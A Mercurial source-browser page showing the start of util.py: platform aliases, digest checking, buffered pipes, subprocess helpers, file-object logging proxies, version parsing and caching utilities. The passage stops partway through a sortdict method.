##// END OF EJS Templates
util: fix unsafe url abort with bytestr() on url...
Augie Fackler -
r36742:ca201470 default
parent child Browse files
Show More
@@ -1,4066 +1,4066 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
def isatty(fp):
    """Report whether ``fp`` is connected to a terminal.

    Objects that do not provide a usable ``isatty()`` (the lookup or the
    call raises AttributeError) are reported as not being a terminal.
    """
    try:
        attached = fp.isatty()
    except AttributeError:
        attached = False
    return attached
89 89
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    # Re-open the same file descriptor with a buffering argument of 1.
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

# Select the platform specific implementation module; everything re-exported
# below as ``platform.<name>`` comes from whichever module is bound here.
if pycompat.iswindows:
    from . import windows as platform
    # On Windows stdout is additionally wrapped by the platform module.
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
# The following helpers are re-exported only when the loaded ``osutil``
# implementation provides them; otherwise the name is simply left undefined
# in this module.
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
try:
    unblocksignal = osutil.unblocksignal
except AttributeError:
    pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 # disable Python's problematic floating point timestamps (issue4836)
180 180 # (Python hypocritically says you shouldn't change this behavior in
181 181 # libraries, and sure enough Mercurial is not a library.)
182 182 os.stat_float_times(False)
183 183
def safehasattr(thing, attr):
    """Return True if ``getattr(thing, attr)`` yields a value.

    The lookup uses the private ``_notset`` sentinel as its default, so an
    attribute whose value is ``None`` (or any other falsy object) still
    counts as present.
    """
    found = getattr(thing, attr, _notset)
    return found is not _notset
186 186
187 187 def _rapply(f, xs):
188 188 if xs is None:
189 189 # assume None means non-value of optional data
190 190 return xs
191 191 if isinstance(xs, (list, set, tuple)):
192 192 return type(xs)(_rapply(f, x) for x in xs)
193 193 if isinstance(xs, dict):
194 194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 195 return f(xs)
196 196
def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    When ``f`` is ``pycompat.identity`` the input object itself is returned
    without being walked or copied.

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is not pycompat.identity:
        return _rapply(f, xs)
    # fast path mainly for py2
    return xs
219 219
def bytesinput(fin, fout, *args, **kwargs):
    """Run ``pycompat.rawinput`` against ``fin``/``fout``.

    ``sys.stdin`` and ``sys.stdout`` are temporarily replaced by
    ``encoding.strio`` wrappers of ``fin`` and ``fout`` and are always
    restored afterwards. The answer is passed through
    ``encoding.strtolocal`` before being returned.
    """
    saved = (sys.stdin, sys.stdout)
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        answer = pycompat.rawinput(*args, **kwargs)
        return encoding.strtolocal(answer)
    finally:
        sys.stdin, sys.stdout = saved
227 227
def bitsfrom(container):
    """Return the bitwise OR of every item in ``container`` (0 if empty)."""
    combined = 0
    for flag in container:
        combined |= flag
    return combined
233 233
# Python 2.6 still has deprecation warnings enabled by default. Regular users
# should never see them, so native deprecation warnings are only switched on
# when the HGEMITWARNINGS environment variable is set (as done when running
# tests).
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
    if pycompat.ispy3:
        # silence warning emitted by passing user string to re.sub()
        warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                                r'mercurial')
        warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                                DeprecationWarning, r'mercurial')
254 254
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.

    ``version`` is interpolated into a note appended to ``msg``;
    ``stacklevel`` is counted from the caller (one level is added here to
    skip this helper's own frame).
    """
    if not _dowarn:
        return
    note = ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    msg += note
    warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
264 264
# Supported digest names mapped to the hashlib constructor implementing them.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# Sanity check at import time: every ranked name must have a constructor.
# NOTE(review): the loop variable ``k`` stays bound at module level afterwards.
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
275 275
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    ``digests`` is an iterable of names that must all be keys of ``DIGESTS``;
    ``s`` is optional initial data fed to every hash. Indexing the object by
    a digest name returns the hex digest of the data seen so far, and
    iterating it yields the names being computed.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every hash being computed."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest for ``key``; Abort on an unknown type."""
        if key not in DIGESTS:
            # Report the name that was actually requested. This used to
            # format an unrelated module-level variable into the message.
            raise Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
322 322
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    Every ``read()`` is forwarded to the wrapped handle while the bytes are
    counted and hashed; ``validate()`` then compares the totals against the
    expectations. When multiple digests are given, all of them are
    validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, accounting for what was read."""
        chunk = self._fh.read(length)
        self._digester.update(chunk)
        self._got += len(chunk)
        return chunk

    def validate(self):
        """Abort unless size and every expected digest match what was read."""
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            if expected != self._digester[name]:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, self._digester[name]))
354 354
try:
    buffer = buffer
except NameError:
    # No builtin ``buffer`` available: provide a memoryview based stand-in.
    def buffer(sliceable, offset=0, length=None):
        """Return a memoryview of ``sliceable`` starting at ``offset``.

        The view covers ``length`` items when given, otherwise everything
        up to the end.
        """
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset:offset + length]
362 362
363 363 closefds = pycompat.isposix
364 364
365 365 _chunksize = 4096
366 366
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer
    is empty from the outside (allowing collaboration of the buffer with
    polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # A fileobjectproxy must be wrapped by the variant of this class
        # that reports activity to the proxy's observer.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        # chunks read from the descriptor but not handed out yet
        self._buffer = []
        self._eof = False
        # total length of everything held in self._buffer
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This is meant to be checked externally before polling for IO: if
        data is already buffered, no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to ``size`` data, filling the buffer until enough is
        available or end of file is reached."""
        while self._lenbuf < size and not self._eof:
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        """Return data up to and including the next newline, or whatever is
        left when end of file is reached first."""
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            merged = ''.join(self._buffer)
            self._buffer = [merged]
            self._lenbuf = len(merged)

        # index of the newline within the most recent chunk, -1 if none yet
        newline = self._buffer[-1].find('\n') if self._buffer else -1
        while newline < 0 and not self._eof:
            self._fillbuffer()
            if self._buffer:
                newline = self._buffer[-1].find('\n')

        if newline < 0:
            # end of file
            size = self._lenbuf
        else:
            size = newline + 1
            if len(self._buffer) > 1:
                # we need to take previous chunks into account
                size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if not self._buffer or size == 0:
            return ''
        if len(self._buffer) > 1:
            pending = ''.join(self._buffer)
        else:
            pending = self._buffer[0]

        data = pending[:size]
        rest = pending[len(data):]
        # keep the leftover as a single collapsed chunk (or nothing at all)
        self._buffer = [rest] if rest else []
        self._lenbuf = len(rest)
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if data:
            self._lenbuf += len(data)
            self._buffer.append(data)
        else:
            # an empty read marks end of file
            self._eof = True

        return data
469 469
def mmapread(fp):
    """Return a read-only memory map of ``fp``.

    ``fp`` is either an object with a ``fileno()`` method or a raw file
    descriptor. Empty files cannot be mapped; for them an empty string is
    returned instead. Any other ValueError is propagated to the caller.
    """
    # Resolve the descriptor before entering the try block: if fileno()
    # itself raised ValueError (e.g. closed file) inside the try, the handler
    # below would run with ``fd`` unbound and mask the real error.
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
480 480
def popen2(cmd, env=None, newlines=False):
    """Run ``cmd`` through the shell and return its (stdin, stdout) pipes.

    ``env`` is passed to the child as its environment and ``newlines``
    is forwarded as ``universal_newlines``.
    """
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
491 491
def popen3(cmd, env=None, newlines=False):
    """Like popen4() but return only the (stdin, stdout, stderr) pipes."""
    pipein, pipeout, pipeerr, _proc = popen4(cmd, env, newlines)
    return pipein, pipeout, pipeerr
495 495
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run ``cmd`` through the shell with all three standard streams piped.

    Returns ``(stdin, stdout, stderr, process)`` where ``process`` is the
    ``subprocess.Popen`` object. ``env``, ``newlines`` (as
    ``universal_newlines``) and ``bufsize`` are forwarded to Popen.
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
504 504
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    Attribute access, assignment, deletion and iteration are forwarded to
    the wrapped file object. The file methods listed in
    ``__getattribute__`` are implemented here instead: each one calls the
    wrapped object and then, if the observer has a method of the same name,
    calls it with the result followed by the original arguments.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        # __setattr__ is forwarded to the wrapped object, so our own slots
        # have to be populated through object.__setattr__.
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # Only the names above are served by the proxy itself; everything
        # else is looked up on the wrapped object.
        if name not in ours:
            return getattr(object.__getattribute__(self, r'_orig'), name)

        return object.__getattribute__(self, name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        """Call ``name`` on the wrapped object, then notify the observer."""
        target = object.__getattribute__(self, r'_orig')
        result = getattr(target, name)(*args, **kwargs)

        # Give the observer's method of the same name (if any) the result
        # and the arguments so it can react, log, etc.
        watcher = object.__getattribute__(self, r'_observer')
        hook = getattr(watcher, name, None)
        if hook:
            hook(result, *args, **kwargs)

        return result

    # The methods below cannot use ``self._observedcall`` directly because
    # that name is not served by __getattribute__ above.

    def close(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'read1', *args, **kwargs)
657 657
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``. Each notification is only sent when the
    observer defines the corresponding method.
    """
    def _fillbuffer(self):
        data = super(observedbufferedinputpipe, self)._fillbuffer()

        notify = getattr(self._input._observer, r'osread', None)
        if notify:
            notify(data, _chunksize)

        return data

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        data = super(observedbufferedinputpipe, self).read(size)

        notify = getattr(self._input._observer, r'bufferedread', None)
        if notify:
            notify(data, size)

        return data

    def readline(self, *args, **kwargs):
        line = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        notify = getattr(self._input._observer, r'bufferedreadline', None)
        if notify:
            notify(line)

        return line
697 697
# Table used by escapedata(): every value in range(256) is first mapped to its
# four character ``\xNN`` hex escape (assumes pycompat.bytechr(i) yields the
# single byte with value i - TODO confirm).
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
# Backslash, carriage return and newline use their short escapes instead.
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Matches each byte that escapedata() rewrites: 0x00-0x08, 0x0a-0x1f, the
# backslash and 0x7f-0xff. Tab (0x09) and the remaining 0x20-0x7e bytes are
# left as they are.
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
705 705
def escapedata(s):
    """Return ``s`` with every byte matched by DATA_ESCAPE_RE replaced by
    its entry in DATA_ESCAPE_MAP.

    A ``bytearray`` argument is converted to ``bytes`` first.
    """
    if isinstance(s, bytearray):
        s = bytes(s)

    def _escape(match):
        return DATA_ESCAPE_MAP[match.group(0)]

    return DATA_ESCAPE_RE.sub(_escape, s)
711 711
class fileobjectobserver(object):
    """Logs file object activity.

    Every observed operation is written to ``fh`` as a line starting with
    ``<name>> ``. ``reads`` and ``writes`` switch logging of read-like and
    write-like operations on or off; ``logdata`` additionally logs the
    (escaped) data that was transferred.
    """
    def __init__(self, fh, name, reads=True, writes=True, logdata=False):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.reads = reads
        self.writes = writes

    def _writedata(self, data):
        """Finish the current log line, appending ``data`` if enabled."""
        if not self.logdata:
            self.fh.write('\n')
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            self.fh.write(': %s\n' % escapedata(data))
            return

        # Data with newlines is written to multiple lines.
        self.fh.write(':\n')
        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n' % (self.name, escapedata(line)))

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                  res))
        # ``res`` is the number of items placed in ``dest`` (or None).
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        # Buffered reads are reads too: honour the ``reads`` switch like
        # read()/readline()/readinto() do.
        if not self.reads:
            return

        self.fh.write('%s> bufferedread(%d) -> %d' % (
            self.name, size, len(res)))
        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
        self._writedata(res)
790 790
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False):
    """Turn a file object into a logging file object.

    Returns a ``fileobjectproxy`` around ``fh`` whose observer is a
    ``fileobjectobserver`` writing to ``logh`` under the label ``name``.
    ``reads``, ``writes`` and ``logdata`` are passed on to the observer.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(logh, name, reads=reads, writes=writes,
                           logdata=logdata))
798 798
def version():
    """Return version information if available.

    The value comes from the package's ``__version__`` module; when that
    module cannot be imported, 'unknown' is returned.
    """
    try:
        from . import __version__ as versionmod
        return versionmod.version
    except ImportError:
        return 'unknown'
806 806
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4 (any other value yields ``None``). Numeric
    components that are missing or not integers are reported as ``None``;
    with ``n`` of 4 the last element is the text following the first ``+``
    or ``-``, or ``None`` when there is none. Here is how some version
    strings map to returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split once on the first '+' or '-'. Both characters are literal inside
    # a character class, so no backslash is needed (the previous '\+' was an
    # invalid string escape sequence).
    parts = remod.split('[+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # stop at the first non-numeric component
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
875 875
def cachefunc(func):
    '''cache the result of function calls

    Returns a wrapper that calls ``func`` once per distinct positional
    argument combination and replays the stored result afterwards. The
    wrapper shape depends on the number of arguments ``func`` declares.
    '''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # a one-element list is enough to remember the single result
        result = []
        def f():
            if not result:
                result.append(func())
            return result[0]
        return f

    cache = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
        return f

    def f(*args):
        if args not in cache:
            cache[args] = func(*args)
        return cache[args]
    return f
901 901
class cow(object):
    """helper class to make copy-on-write easier

    ``copy()`` hands out the object itself and counts the outstanding cheap
    copies in ``_copied``; ``preparewrite()`` performs the real copy when
    such a copy is still outstanding.

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        outstanding = getattr(self, '_copied', 0)
        if not outstanding:
            return self
        self._copied = outstanding - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        outstanding = getattr(self, '_copied', 0)
        self._copied = outstanding + 1
        return self
919 919
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    Keys are kept in last-set order: assigning to an existing key moves it
    to the end.

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # drop any existing entry first so the key is re-inserted at the end
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
